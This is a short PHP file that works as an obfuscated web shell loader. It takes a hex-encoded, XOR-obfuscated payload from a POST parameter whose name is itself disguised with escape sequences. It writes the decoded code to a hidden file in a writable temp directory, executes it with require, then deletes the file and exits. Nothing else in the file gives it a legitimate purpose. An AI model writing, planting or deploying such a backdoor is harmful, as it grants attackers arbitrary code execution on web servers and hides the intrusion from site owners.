<?php

if(isset($_POST["r\x65\x73o\x75rce"]) ? true : false){
	$item = hex2bin($_POST["r\x65\x73o\x75rce"]);
	$factor      =     ''    ;    $e = 0; while($e < strlen($item)){$factor .= chr(ord($item[$e]) ^ 88);$e++;}
	$marker = array_filter([session_save_path(), getenv("TMP"), "/tmp", "/dev/shm", "/var/tmp", ini_get("upload_tmp_dir"), getenv("TEMP"), sys_get_temp_dir(), getcwd()]);
	while ($res = array_shift($marker)) {
    		if (max(0, is_dir($res) * is_writable($res))) {
    $pgrp = join("/", [$res, ".obj"]);
    if (file_put_contents($pgrp, $factor)) {
	require $pgrp;
	unlink($pgrp);
	die();
}
}
}
}